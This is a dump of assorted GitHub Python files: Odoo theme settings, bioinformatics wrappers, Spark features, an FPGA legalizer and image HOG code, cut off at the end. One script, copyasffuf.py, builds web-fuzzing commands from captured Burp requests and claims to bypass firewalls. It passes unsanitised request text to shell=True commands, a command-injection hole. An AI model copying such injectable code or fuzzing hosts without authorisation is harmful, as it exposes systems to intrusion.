config.get_param(key=\"anita_theme_setting.allow_debug\", default=\"Awesome odoo\")\n powered_by = config.get_param(key=\"anita_theme_setting.powered_by\", default=\"Awesome odoo\")\n menu_icon_policy = config.get_param(\n key=\"anita_theme_setting.menu_icon_policy\", default=\"svg_icon\")\n\n tab_style = config.get_param(key=\"anita_theme_setting.tab_style\", default=\"normal\")\n icon_style = config.get_param(key=\"anita_theme_setting.icon_style\", default=\"normal\")\n \n return {\n \"layout_mode\": layout_mode,\n \"login_style\": login_style,\n \"theme_setting_mode\": theme_setting_mode,\n \"current_theme_mode\": int(current_theme_mode),\n \"current_theme_style\": int(current_theme_style),\n \"dialog_pop_style\": dialog_pop_style,\n \"button_style\": button_style,\n \"control_panel_mode\": control_panel_mode,\n \"table_style\": table_style,\n \"font_name\": font_name,\n \"show_app_name\": show_app_name,\n \"rtl_mode\": rtl_mode,\n \"favorite_mode\": favorite_mode,\n \"allow_debug\": allow_debug,\n \"window_default_title\": window_default_title,\n \"powered_by\": powered_by,\n \"menu_icon_policy\": menu_icon_policy,\n \"tab_style\": tab_style,\n \"icon_style\": icon_style,\n }\n\n def set_values(self):\n '''\n set values\n :return:\n '''\n super(AnitaUserSetting, self).set_values()\n\n ir_config = self.env['ir.config_parameter'].sudo()\n\n ir_config.set_param(\"anita_theme_setting.layout_mode\", self.layout_mode or \"Layout1\")\n ir_config.set_param(\"anita_theme_setting.login_style\", self.login_style or \"login_style1\")\n ir_config.set_param(\"anita_theme_setting.theme_setting_mode\", self.theme_setting_mode or 'system')\n ir_config.set_param(\"anita_theme_setting.current_theme_mode\", self.current_theme_mode.id or False)\n ir_config.set_param(\"anita_theme_setting.current_theme_style\", self.current_theme_style.id or False)\n ir_config.set_param(\"anita_theme_setting.dialog_pop_style\", self.dialog_pop_style or 'normal')\n ir_config.set_param(\"anita_theme_setting.button_style\", self.button_style or 'btn-style-normal')\n ir_config.set_param(\"anita_theme_setting.table_style\", self.table_style or 'normal')\n ir_config.set_param(\"anita_theme_setting.control_panel_mode\", self.control_panel_mode or 'normal')\n ir_config.set_param(\"anita_theme_setting.font_name\", self.font_name or 'Roboto')\n ir_config.set_param(\"anita_theme_setting.show_app_name\", self.show_app_name)\n ir_config.set_param(\"anita_theme_setting.rtl_mode\", self.rtl_mode)\n ir_config.set_param(\"anita_theme_setting.favorite_mode\", self.favorite_mode)\n ir_config.set_param(\"anita_theme_setting.allow_debug\", self.favorite_mode)\n\n ir_config.set_param(\"anita_theme_setting.window_default_title\", self.window_default_title)\n ir_config.set_param(\"anita_theme_setting.powered_by\", self.powered_by)\n\n ir_config.set_param(\"anita_theme_setting.menu_icon_policy\", self.menu_icon_policy)\n ir_config.set_param(\"anita_theme_setting.tab_style\", self.tab_style)\n ir_config.set_param(\"anita_theme_setting.icon_style\", self.icon_style)\n\n def set_values_company_favicon(self):\n '''\n set the favicon of company\n :return:\n '''\n company = self.sudo().env['res.company']\n records = company.search([])\n\n if len(records) > 0:\n for record in records:\n record.write({'favicon': self._set_web_favicon(original=True)})\n\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n }\n\n @api.model\n def get_login_style(self):\n '''\n get login style\n :return:\n '''\n ir_config = self.env['ir.config_parameter'].sudo()\n login_style = ir_config.get_param(\n key='anita_theme_setting.login_style', default='login_style1')\n return login_style\n","repo_name":"vjd8866/awesome_theme","sub_path":"anita_theme_setting/models/anita_res_setting.py","file_name":"anita_res_setting.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16719254449","text":"#!/usr/bin/python3\n\"\"\"script that factorize as many numbers as possible into a\n product of two smaller numbers\"\"\"\n\n\ndef descom_number(num):\n \"\"\"Extracts the first prime factor of the number, and displays the\n output formatted with the 2 respective factors.\n\n Args:\n num (int): the number that will be decomposed.\n Attributes:\n tmp (int): stores the number that will be decomposed so as not\n to lose the value.\n factor_primo: the number with which we will be dividing\n \"\"\"\n tmp = num\n factor_primo = 2\n\n while num > 1:\n if num % factor_primo == 0:\n num /= factor_primo\n print(f\"{tmp}={int(num)}*{factor_primo}\")\n break\n else:\n factor_primo += 1\n\n\nfile = open('tests/test00')\nlistlines = file.readlines()\n\nfor line in listlines:\n descom_number(int(line))\n","repo_name":"Dfunn1k/RSA-Factoring-Challenge","sub_path":"factors.py","file_name":"factors.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"1774281660","text":"from baskerville.features.updateable_features import UpdaterVariance\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Window\n\nfrom baskerville.features.feature_request_total import FeatureRequestTotal\nfrom baskerville.features.feature_request_interval_average import \\\n FeatureRequestIntervalAverage\nfrom baskerville.features.helpers import update_variance\n\n\nclass FeatureRequestIntervalVariance(UpdaterVariance):\n \"\"\"\n For each IP compute the variance of the time interval between subsequent\n requests (in minutes).\n \"\"\"\n DEFAULT_VALUE = 0.\n COLUMNS = ['@timestamp']\n DEPENDENCIES = [FeatureRequestTotal, FeatureRequestIntervalAverage]\n\n def __init__(self):\n super(FeatureRequestIntervalVariance, self).__init__()\n\n self.w = Window.partitionBy(\n F.col('client_request_host'), F.col('client_ip')\n ).orderBy(F.col(\"@timestamp\"))\n self.group_by_aggs = {\n 'request_interval_var': F.variance(\n F.col('request_interval').cast('float') / 60.\n ),\n }\n self.pre_group_by_calcs = {\n 'row_num_per_group':\n F.row_number().over(self.w),\n 'prev_ts': F.lag(F.col('@timestamp')).over(\n self.w),\n 'request_interval': F.when(\n F.col('row_num_per_group') > 1,\n F.when(\n F.isnull(\n F.col('@timestamp').cast('long') -\n F.col('prev_ts').cast('long')\n ), 0\n ).otherwise(\n F.col('@timestamp').cast('long') -\n F.col('prev_ts').cast('long')\n )).otherwise(None),\n }\n\n def compute(self, df):\n from pyspark.sql import functions as F\n\n df = df.withColumn(\n self.feature_name,\n F.when(\n F.isnan(F.col('request_interval_var')) |\n F.isnull(F.col('request_interval_var')),\n F.lit(self.feature_default).cast('float')\n ).otherwise(F.col('request_interval_var').cast('float'))\n ).fillna({self.feature_name: self.feature_default})\n return df\n\n @classmethod\n def update_row(cls, current, past, *args, **kwargs):\n return update_variance(\n past.get(cls.feature_name_from_class()),\n current[cls.feature_name_from_class()],\n past.get(FeatureRequestTotal.feature_name_from_class()),\n current[FeatureRequestTotal.feature_name_from_class()],\n past.get(FeatureRequestIntervalAverage.feature_name_from_class()),\n current[FeatureRequestIntervalAverage.feature_name_from_class()]\n )\n\n def update(self, df, feat_column='features', old_feat_column='old_features'):\n return super().update(\n df,\n self.feature_name,\n FeatureRequestTotal.feature_name_from_class(),\n FeatureRequestIntervalAverage.feature_name_from_class()\n )\n","repo_name":"deflect-ca/baskerville","sub_path":"src/baskerville/features/feature_request_interval_variance.py","file_name":"feature_request_interval_variance.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"33"} +{"seq_id":"40039582853","text":"__all__ = ('AutocompleteList',)\n\n\nclass AutocompleteList(object):\n limit_choices = 20\n order_by = lambda cls, choice: unicode(choice).lower()\n\n def choices_for_values(self):\n values_choices = []\n\n for choice in self.choices:\n if choice in self.values:\n values_choices.append(choice)\n\n return self.order_choices(values_choices)\n\n def choices_for_request(self):\n assert self.choices, 'autocomplete.choices is not set'\n\n requests_choices = []\n q = self.request.GET.get('q', '').lower().strip()\n\n for choice in self.choices:\n if q in unicode(choice).lower():\n requests_choices.append(choice)\n\n return self.order_choices(requests_choices)[0:self.limit_choices]\n\n def order_choices(self, choices):\n return sorted(choices, key=self.order_by)\n","repo_name":"hzlf/openbroadcast","sub_path":"website/tools/autocomplete_light/autocomplete/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"40200936946","text":"# Wrapper classes to PAML\nfrom __future__ import absolute_import\n\nimport os\nimport re\n\nfrom phylogenetics.utils import run_subprocess\nfrom dendropy import Tree\n\nclass ControlFile(object):\n\n def __init__(self, **kwargs):\n \"\"\" Base class for writing a PAML control file\"\"\"\n # Set the key word arguments as attributes of subclass\n for kw in kwargs:\n setattr(self, kw, kwargs[kw])\n\n self.input = kwargs\n\n @property\n def string(self):\n \"\"\"\n Write control file as single string.\n \"\"\"\n output_string = \"\"\n for kw in self.input:\n output_string += kw + \" = \" + str(self.input[kw]) + \"\\n\"\n\n return output_string\n\n def read(self, fname):\n \"\"\" Read from outside control file. \"\"\"\n pass\n\n def write(self, fname):\n \"\"\" Write PAML control file. \"\"\"\n with open(fname, \"w\") as f:\n f.write(self.string)\n\n\nclass BaseML(ControlFile):\n \"\"\"\n Construct a BaseML Control File object\n \"\"\"\n def __init__(self,\n seqfile=\"baseml.nuc\",\n outfile=\"baseml.mlb\",\n treefile=\"tree.nwk\",\n noisy=0,\n verbose=0,\n runmode=0,\n model=0,\n Mgene=0,\n ndata=1,\n clock=0,\n TipDate=\"0 100\",\n fix_kappa=0,\n kappa=0,\n fix_alpha=0,\n alpha=0,\n Malpha=0,\n ncatG=5,\n fix_rho=1,\n rho=0,\n nparK=0,\n nhomo=0,\n getSE=0,\n RateAncestor=0,\n Small_Diff=1e-6,\n cleandata=1,\n icode=0,\n fix_blength=0,\n method=0\n ):\n \"\"\"\"\"\"\n # Inherit base class\n super(BaseML, self).__init__(\n seqfile=seqfile,\n outfile=outfile,\n treefile=treefile,\n noisy=noisy,\n verbose=verbose,\n runmode=runmode,\n model=model,\n Mgene=Mgene,\n ndata=ndata,\n clock=clock,\n TipDate=TipDate,\n fix_kappa=fix_kappa,\n kappa=kappa,\n fix_alpha=fix_alpha,\n alpha=alpha,\n Malpha=Malpha,\n ncatG=ncatG,\n fix_rho=fix_rho,\n rho=rho,\n nparK=nparK,\n nhomo=nhomo,\n getSE=getSE,\n RateAncestor=RateAncestor,\n Small_Diff=Small_Diff,\n cleandata=cleandata,\n icode=icode,\n fix_blength=fix_blength,\n method=method\n )\n\n\n def run(self, ):\n \"\"\" Run BaseML \"\"\"\n pass\n\n\n\n\nclass CodeML(ControlFile):\n \"\"\"\n Construct a CodeML Control File object\n \"\"\"\n def __init__(self,\n seqfile=\"sequences.fasta\",\n outfile=\"codeml_output.txt\",\n treefile=\"tree.nwk\",\n noisy=3,\n verbose=9,\n runmode=0,\n seqtype=2,\n #CodonFreq=0,\n #ndata=1,\n #clock=0,\n #aaDist=0,\n aaRatefile=\"lg.dat\",\n model=3,\n #NSsites=0,\n #icode=0,\n #Mgene=0,\n #fix_kappa=0,\n #kappa=0,\n #fix_omega=0,\n #omega=0.4,\n fix_alpha=0,\n alpha=1,\n #Malpha=0,\n ncatG=4,\n #fix_rho=1,\n #rho=0,\n #getSE=0,\n RateAncestor=2,\n Small_Diff=1e-6,\n cleandata=0,\n fix_blength=1,\n method=1\n ):\n \"\"\"\n \"\"\"\n # Construct path to data files from location of installation\n self.aaRatefile_path = os.path.join(os.path.split(__file__)[0], \"dat\")\n\n # Inherit base class\n super(CodeML, self).__init__(\n seqfile=seqfile,\n outfile=outfile,\n treefile=treefile,\n noisy=noisy,\n verbose=verbose,\n runmode=runmode,\n seqtype=seqtype,\n #CodonFreq=CodonFreq,\n #ndata=ndata,\n #clock=clock,\n #aaDist=aaDist,\n aaRatefile= os.path.join(self.aaRatefile_path, aaRatefile),\n model=model,\n #NSsites=NSsites,\n #icode=icode,\n #Mgene=Mgene,\n #fix_kappa=fix_kappa,\n #kappa=kappa,\n #fix_omega=fix_omega,\n #omega=omega,\n fix_alpha=fix_alpha,\n alpha=alpha,\n #Malpha=Malpha,\n ncatG=ncatG,\n #fix_rho=fix_rho,\n #rho=rho,\n #getSE=getSE,\n RateAncestor=RateAncestor,\n Small_Diff=Small_Diff,\n cleandata=cleandata,\n fix_blength=fix_blength,\n method=method\n )\n\n\n\n def run(self, fname=\"codeml-input.txt\"):\n \"\"\" \"\"\"\n # CHECK FOR NECESSARY FILES (PHYLIP and NEWICK)\n if os.path.isfile(self.seqfile) is False:\n raise Exception(\"\"\" seqfile does not exist! \"\"\")\n if os.path.isfile(self.treefile) is False:\n raise Exception(\"\"\" treefile does not exist! \"\"\")\n\n # Write out the control file\n self.write(fname)\n\n # Run a subprocess for codeml\n run_subprocess(\"codeml\", fname)\n","repo_name":"cnyuanh/phylogenetics","sub_path":"phylogenetics/exttools/paml.py","file_name":"paml.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"26643947579","text":"from django.core.management import BaseCommand\n\nfrom apps.development.models import Note\nfrom apps.development.models.note import NoteType\n\n\nclass Command(BaseCommand):\n \"\"\"Check empty spends.\"\"\"\n\n def handle(self, *args, **options): # noqa: WPS110\n \"\"\"Handle command.\"\"\"\n notes = Note.objects.filter(\n type=NoteType.TIME_SPEND,\n time_spend__isnull=True,\n )\n if not notes.exists():\n return\n\n self.stdout.write(\"Found {0} items\".format(notes.count()))\n for note in notes.order_by(\"user\"):\n self.stdout.write(\n \"{0} -> {1} [object.pk={2}][note.pk={3}]\".format(\n note.content_type,\n note.content_object,\n note.object_id,\n note.pk,\n ),\n )\n","repo_name":"team-projector/backend","sub_path":"server/apps/development/management/commands/check_empty_spends.py","file_name":"check_empty_spends.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20661059577","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\n\nRED = \"\\033[1;31m\" \nBLUE = \"\\033[1;34m\"\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[0;32m\"\nRESET = \"\\033[0;0m\"\nBOLD = \"\\033[;1m\"\n\n\ndef check_if_http(file_content):\n allowed_methods=[\"GET\",\"POST\",\"PUT\"]\n temp_file_content=file_content\n for i in range(len(temp_file_content)):\n temp_file_content[i]=' '.join(temp_file_content[i].split())\n temp_file_content=list(filter(None,file_content))\n request_type=\"\"\n for x in allowed_methods:\n if x in temp_file_content[0]:\n request_type=x\n if request_type==\"\":\n sys.stdout.write(BOLD+RED)\n print(\"[-] Request does not seem to be HTTP or Supported request type (Get, Post, Put)\")\n exit()\n else:\n return request_type\n\ndef parse_request(file_content,request_type):\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Parsing request...\")\n req=dict()\n req[\"request_type\"]=request_type\n if request_type==\"GET\":\n #remove all blank lines and tabs\n for i in range(len(file_content)):\n file_content[i]=' '.join(file_content[i].split())\n file_content=list(filter(None,file_content))\n #headers parsing\n req[\"headers\"]=file_content[1:]\n for header in req[\"headers\"]:\n key,value = header.split(':',1)#split each line by http field name and value\n if(key==\"Host\"):\n req[\"host\"]=value.strip()\n #get request query\n req[\"query\"]=file_content[0].split(\" \")[1].strip()\n return(req)\n else:\n #parsing post request\n while 1:\n if file_content[0]==\"\":\n del file_content[0]\n elif file_content[len(file_content)-1]==\"\":\n del file_content[len(file_content)-1]\n else:\n break\n req[\"request_type\"]=request_type\n #post request query\n req[\"query\"]=file_content[0].split(\" \")[1].strip()\n #headers and body parsing\n for i in range(len(file_content)):\n if file_content[i]==\"\":\n lastheaderat=i\n break\n req[\"headers\"]=file_content[1:lastheaderat]\n req[\"body\"]=file_content[lastheaderat:]\n #host parsing\n for header in req[\"headers\"]:\n key,value = header.split(':')#split each line by http field name and value\n if(key==\"Host\"):\n req[\"host\"]=value.strip()\n break\n return req\n \ndef make_ffuf_command(req):\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Generating ffuf command\")\n #ffuf -u http://target.com/FUZZ -w wordlist.txt\n str=\"\"\n for header in req['headers']:\n str+=f' -H \\'{header}\\''\n url=f'https://{req[\"host\"]}{req[\"query\"]}'\n if url[len(url)-1]==\"/\":\n url=url[:-1]\n if \"body\" in req :\n body=f\" -d \\'{' '.join(req['body']).strip()}\\'\"\n else:\n body=\"\"\n cmd=f\"ffuf -X {req['request_type']}{body} {str} -u {url}/FUZZ -w \"\n process = subprocess.Popen('printf \"hello\\nDhello2\\nhello3\" |'+cmd+'- > /dev/null 2>&1 ', shell=True, stdout=subprocess.PIPE)\n process.wait()\n cmd+=\"wordlist\"\n if process.returncode==0 :\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] ffuf command created successfully\")\n process = subprocess.Popen('echo -n \"'+cmd+'\" | xclip -selection clipboard', shell=True, stdout=subprocess.PIPE)\n process.wait()\n if process.returncode==0:\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Command copied to clipboard\")\n sys.stdout.write(BOLD+BLUE)\n print(\"[+] Don't forget to change wordlist and FUZZ\")\n\n else:\n process = subprocess.Popen('echo -n \"'+cmd+'\" | xclip -selection clipboard', shell=True, stdout=subprocess.PIPE)\n process.wait()\n if process.returncode==0:\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Command copied to clipboard\")\n sys.stdout.write(BOLD+RED)\n print(\"[-] errr... code bugged out, this is what i come up with\")\n sys.stdout.write(BOLD+RESET) \n print(cmd)\n exit()\n\n\ndef make_curl_command(req):\n sys.stdout.write(BOLD+RED)\n print(\"[+] To be added soon\")\n exit()\n\nif __name__ == \"__main__\":\n # Parse command line\n parser = argparse.ArgumentParser(description=\"Automatically output ffuf and curl commands that works bypassing firewall for an input request file!! \(*¬*)/\")\n parser.add_argument(\"-f\",\"--file\",help=\"Input a captured request file from burp\", \n required=\"True\",action=\"store\")\n parser.add_argument(\"-m\",\"--mode\",help=\"Output command type (ffuf,kr,curl)\",\n default=\"ffuf\", action=\"store\")\n args = parser.parse_args()\n\n if not os.path.exists(args.file):\n sys.stdout.write(BOLD+RED)\n parser.error(\"[-] The file %s does not exist!\" % args.file)\n exit\n else:\n f=open(args.file, 'r')\n file_content=f.read().split('\\n')\n if len(file_content)==1 and file_content[0]==\"\":\n sys.stdout.write(BOLD+RED)\n print(\"[-] File is empty. Please check\")\n exit()\n\n request_type=check_if_http(file_content)\n\n req=parse_request(file_content,request_type)\n\n if args.mode==\"ffuf\":\n make_ffuf_command(req)\n elif args.mode==\"curl\":\n make_curl_command(req)\n else:\n print(\"[-] Nothing matches %s\" % args.mode)","repo_name":"w33knd/copyasffuf","sub_path":"copyasffuf.py","file_name":"copyasffuf.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39363795674","text":"\"\"\"\nModule: types_config.py\nHolds config for TypesUpdate utilite from app.backend.controller.utils.offline_types.types_update.py\n\"\"\"\n\nimport os\n\nfrom . import config\n\n\nclass TypesUpdateConfig(object):\n # Inner settings\n try:\n APP_DIRECTORY = config.Config.APP_DIRECTORY\n except AttributeError:\n APP_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\n\n TARGET = os.path.join(APP_DIRECTORY, '../app/backend/controller/utils/offline_types/types.py')\n TEMPLATE = os.path.join(APP_DIRECTORY, '../app/backend/controller/utils/offline_types/script.py.mako')\n\n # Common settings\n COMMON = {\n # See available names in types.__all__\n 'NAMES': ['UserRoleType', 'UserSubscriptionPlanType', 'LoggerType', 'BookmakerType'],\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 15,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 0,\n 'ONE_TIME': False,\n 'PRIORITY': False\n }\n\n # Individual settings\n INDIVIDUAL = {\n 'UserRoleType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'UserSubscriptionPlanType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'LoggerType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'BookmakerType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n }\n }\n\n","repo_name":"alshitov/BetBot-web","sub_path":"config/types_config.py","file_name":"types_config.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"34267555617","text":"from models.alert import Alert\n\n\n# _alert = Alert('8f976b58058d42c3a87273b210f39ff3', 500)\n\n# _alert.saveToDb()\n\nalerts = Alert.all()\n\nfor alert in alerts:\n alert.load_item_price()\n alert.notify_if_price_reached()\n\n# 問題? 為何不要 price 做在 item 裡面就好\n\nif not alerts:\n print(\"no alerts\")","repo_name":"power80203/flask_temp_project_priceal","sub_path":"alert_updater.py","file_name":"alert_updater.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37532489321","text":"'''\n@File: dsp_ram_legalization.py\n@Author: Rachel Selina Rajarathnam (DREAMPlaceFPGA) \n@Date: Oct 2020\n'''\nimport math\nimport torch\nfrom torch import nn\nfrom torch.autograd import Function\nimport matplotlib.pyplot as plt\nimport pdb \nimport numpy as np\n\nimport dreamplacefpga.ops.dsp_ram_legalization.legalize_cpp as legalize_cpp\nimport dreamplacefpga.configure as configure\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass LegalizeDSPRAMFunction(Function):\n @staticmethod\n def legalize(pos, placedb, region_id, model):\n \"\"\"\n @brief legalize DSP/RAM at the end of Global Placement\n @param locX Instance locX ndarray\n @param locY Instance locY ndarray\n @param num_nodes Instance count\n @param num_sites Instance site count\n @param sites Instance site ndarray \n @param precondWL Instance wirelength preconditioner ndarray \n @param dInit lg_max_dist_init\n @param dIncr lg_max_dist_incr\n @param fScale lg_flow_cost_scale\n @param movVal Maximum & Average Instance movement (list)\n @param outLoc Legalized Instance locations list - {x0, x1, ... xn, y0, y1, ... yn} \n \"\"\"\n lg_max_dist_init=10.0\n lg_max_dist_incr=10.0\n lg_flow_cost_scale=100.0\n numNodes = int(pos.numel()/2)\n num_inst = int(placedb.num_movable_nodes_fence_region[region_id])\n outLoc = np.zeros(2*num_inst, dtype=np.float32).tolist()\n\n if region_id == 2:\n mask = model.data_collections.dsp_mask\n sites = placedb.dspSiteXYs\n elif region_id == 3:\n mask = model.data_collections.ram_mask\n sites = placedb.ramSiteXYs\n\n locX = pos[:placedb.num_physical_nodes][mask].cpu().detach().numpy()\n locY = pos[numNodes:numNodes+placedb.num_physical_nodes][mask].cpu().detach().numpy()\n\n num_sites = len(sites)\n precondWL = model.precondWL[:placedb.num_physical_nodes][mask].cpu().detach().numpy()\n movVal = np.zeros(2, dtype=np.float32).tolist()\n\n legalize_cpp.legalize(locX, locY, num_inst, num_sites, sites.flatten(), precondWL, lg_max_dist_init, lg_max_dist_incr, lg_flow_cost_scale, movVal, outLoc)\n\n outLoc = np.array(outLoc)\n updLoc = torch.from_numpy(outLoc).to(dtype=pos.dtype, device=pos.device)\n pos.data[:placedb.num_physical_nodes].masked_scatter_(mask, updLoc[:num_inst])\n pos.data[numNodes:numNodes+placedb.num_physical_nodes].masked_scatter_(mask, updLoc[num_inst:])\n\n return movVal \n\n","repo_name":"rachelselinar/DREAMPlaceFPGA","sub_path":"dreamplacefpga/ops/dsp_ram_legalization/dsp_ram_legalization.py","file_name":"dsp_ram_legalization.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"33"} +{"seq_id":"20690926463","text":"import praw\r\n\r\nclass from_subreddit:\r\n def __init__(self,sub_name,l):\r\n self. r = praw.Reddit(\r\n\r\n client_id=\"[Your client id]\",\r\n client_secret=\"[Your client secret]\",\r\n user_agent=\"gasjasgavbsdkjavsdjhvads\",\r\n )\r\n self.name = sub_name\r\n self.subreddit = self.r.subreddit(self.name)\r\n self.limit = l\r\n\r\n def get_posts(self): \r\n posts = []\r\n \r\n for post in self.subreddit.hot(limit = self.limit):\r\n \r\n if post.url.endswith('.jpg') or post.url.endswith('.png'):\r\n\r\n posts.append(post)\r\n\r\n return posts\r\n\r\n\r\n def get_url_list(self):\r\n urls = []\r\n for post in self.subreddit.hot(limit=self.limit):\r\n if post.url.endswith('.jpg') or post.url.endswith('.png'):\r\n urls.append(post.url)\r\n return urls\r\n\r\n","repo_name":"ReiettoAyanami/RedditPyVisual","sub_path":"redditinfo.py","file_name":"redditinfo.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"72779841055","text":"# Databricks notebook source\n# load data from API\n\nimport requests\nimport json\n\ndef api_data(url):\n response = requests.get(url)\n json_data = json.loads(response.text)\n return json_data\n\nurl = f\"https://jsonplaceholder.typicode.com/users\"\n\na = api_data(url)\n\n\napi_data = json.dumps(a)\n\n\ndf = spark.createDataFrame(a)\n#display(df)\n\n\n# define schema\ndf.printSchema()\n\n\ndbutils.fs.put(\"dbfs:/Nested_json/api_json1.json\",api_data)\n\n\nfrom pyspark.sql.types import StructField, StructType, StringType, MapType,IntegerType\nmapCol = MapType(StringType(),StringType(),True)\nrootschema = StructType([\n StructField('address', MapType(StringType(),StringType(),True)),\nStructField('company', MapType(StringType(),StringType(),True)),\n StructField('email',StringType(),True),\n StructField('id',IntegerType(),True),\n StructField('phone',StringType(),True),\n StructField('username',StringType(),True),\n StructField('website',StringType(),True)])\n\n\n\ndf1 = spark.read.format('json').schema(rootschema).load('dbfs:/Nested_json/api_json1.json')\ndisplay(df1)\n\n\nfrom pyspark.sql.functions import explode,col\ndf2 = df.select(df.address.city,df.address.zipcode,df.address.geo)\ndisplay(df2)\n\n\n","repo_name":"hari328373/rest_api","sub_path":"load_data_from_url/json_url.py","file_name":"json_url.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6958683688","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom numba import njit\n\n# Vertical kernel\nkernel = np.array([[-1],\n [0],\n [1]])\n\n# Horizontal kernel\nkernel2 = np.array([[-1, 0, 1]])\nwindow_size = 8\n\n@njit()\ndef cal_histogram(angles, mags):\n SizeX = int((angles[0].shape[0]) / window_size)\n SizeY = int((angles[0].shape[1]) / window_size)\n\n histogram_list = np.zeros((SizeY, SizeX, 9))\n for x in range(0, SizeX):\n for y in range(0, SizeY):\n r = x * window_size\n c = y * window_size\n\n \n # Finds the biggest magnitude from the three channels and uses this as the magnitude together with the connected angle.\n for i in range(0, window_size):\n for j in range(0, window_size):\n working_angle = 0.0\n working_mag = 0.0\n for channel in range(len(angles)):\n # This is for bins spaced over 0◦–180◦, i.e. the ‘sign’ of the gradient is ignored.\n if mags[channel][r + i][c + j] > working_mag:\n working_angle = angles[channel][r + i][c + j]\n working_mag = mags[channel][r + i][c + j]\n\n # If the angle is bigger than 180 it is changed into the corespoinding normalized in between 0 an 180.\n if working_angle > 180:\n working_angle -= 180\n\n # This section divides the magnitudes out in the 9 histogram bins.\n bin = int(working_angle / 20.0)\n per_for_next_upper = ((bin + 1) * 20 - working_angle) / 20\n per_for_next_bottom = (working_angle - bin * 20) / 20\n\n if bin == 8:\n histogram_list[y, x][bin] += working_mag * per_for_next_bottom\n histogram_list[y, x][0] += working_mag * per_for_next_upper\n else:\n histogram_list[y, x][bin] += working_mag * per_for_next_bottom\n histogram_list[y, x][bin + 1] += working_mag * per_for_next_upper\n\n return histogram_list\n\n\ndef calculate_Hog_OPENCV(frame, notUsed=None):\n # full list of settings for HoG:\n # winSize = (64,128)\n # blockSize = (16,16)\n # blockStride = (8,8)\n # cellSize = (8,8)\n # nbins = 9\n # derivAperture = 1\n # winSigma = 4.\n # histogramNormType = 0\n # L2HysThreshold = 2.0000000000000001e-01\n # gammaCorrection = 0\n # nlevels = 64\n # signedGradient = False\n # hog = cv.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,\n # histogramNormType,L2HysThreshold,gammaCorrection,nlevels,signedGradient)\n \n # but defaults perform better\n hog = cv.HOGDescriptor()\n winStride = (8,8)\n padding = (8,8)\n locations = ((0,0),)\n hist = hog.compute(frame,winStride,padding,locations)\n return hist.ravel(), None\n\n\ndef calculate_Hog(frame, draw_arrows = False):\n channels = cv.split(frame) #splits the image into the threechannels\n\n # Calculate the gradients in x and y direction\n mags = []\n angles = []\n for channel in channels:\n gy = (np.float32(cv.filter2D(channel, -1, kernel)) / 255.0)\n gx = (np.float32(cv.filter2D(channel, -1, kernel2)) / 255.0)\n # Converts them into polar coordinates and saves themagnitudes and angles in two lists\n mag, angle = cv.cartToPolar(gx, gy, angleInDegrees=True)\n mags.append(mag)\n angles.append(angle)\n # Converts them into polar coordinates and saves themagnitudes and angles in two lists\n histogram_list = cal_histogram(angles, mags)\n\n # print(histogram_list.shape)\n # fig, axs = plt.subplots(histogram_list.shape[1], histogram_list.shape[0])\n # for i, var_name in enumerate(histogram_list):\n # for j, var_name2 in enumerate(histogram_list[i]):\n # axs[j, i].hist(histogram_list[i, j], bins=9)\n \n # Initializing a list to put the features in\n feature_vector = []\n \n e = 0.0000001\n for x in range(0, histogram_list.shape[0] - 1):\n row_x = []\n for y in range(0, histogram_list.shape[1] - 1):\n new_hist = np.array([]).astype(np.float32)\n for x_new in range(0, 2):\n for y_new in 